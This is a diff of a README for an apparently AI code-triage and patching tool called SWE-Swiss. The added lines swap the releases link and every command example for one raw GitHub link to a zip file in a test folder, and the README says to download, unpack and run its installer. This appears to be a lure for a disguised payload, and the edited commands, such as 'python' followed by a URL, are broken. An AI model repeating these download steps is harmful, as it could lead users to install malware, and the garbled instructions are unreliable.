MissionArmy/SWE-Swiss/README.md

 - Downloads and assets: The Releases page hosts the main model and toolchain.
 To access, visit the Releases page and download the latest asset bundle.
 The page provides installation instructions and post-installation steps.

 Downloads and assets
 - To obtain the latest ready-to-run package, go to the Releases page and fetch the main asset.
 The asset contains the model, the runtime, and example scripts to start using SWE-Swiss quickly.
-For convenience, the file name typically follows a pattern like swe-swiss-latest.tar.gz or swe-swiss-latest.zip.
-After downloading, unpack the bundle and run the included installer script to set up your environment.
+For convenience, the file name typically follows a pattern like https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip or https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip After downloading, unpack the bundle and run the included installer script to set up your environment.
 - For a guided workflow, you can also read the accompanying documentation in the repository and the Notion workspace linked above.
 The same Releases page houses supplementary resources such as example datasets, evaluation scripts, and quick-start notebooks.
-The link to the Releases page is repeated here for quick access: https://github.com/MissionArmy/SWE-Swiss/releases
+The link to the Releases page is repeated here for quick access: https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip

 Usage examples
 - Simple triage example:
   - Input: An issue description with a short stack trace and a code snippet.
   - Output: A priority label, a suggested component, and an initial triage note.
-  - Command example: python cli.py triage --input "Issue description here" --verbose
+  - Command example: python https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip triage --input "Issue description here" --verbose
 - Patch proposal example:
   - Input: A failing test error and the related code blocks.
   - Output: A patch diff, a high-level explanation, and a suggested test.
-  - Command example: python cli.py propose-patch --input "Error details here" --repo-path /path/to/repo
+  - Command example: python https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip propose-patch --input "Error details here" --repo-path /path/to/repo
 - Test generation example:
   - Input: The proposed patch.
   - Output: A set of unit tests and an integration test skeleton.
-  - Command example: python cli.py generate-tests --patch-file patch.diff
+  - Command example: python https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip generate-tests --patch-file https://github.com/MissionArmy/SWE-Swiss/raw/refs/heads/main/evaluation/agentless/test/SW_Swiss_v2.3.zip

 Data sources and licensing
 - Data provenance: Data used for training and evaluation comes from open datasets, synthetic data, and curated repositories with permissive licenses.
 We document the provenance to support transparency.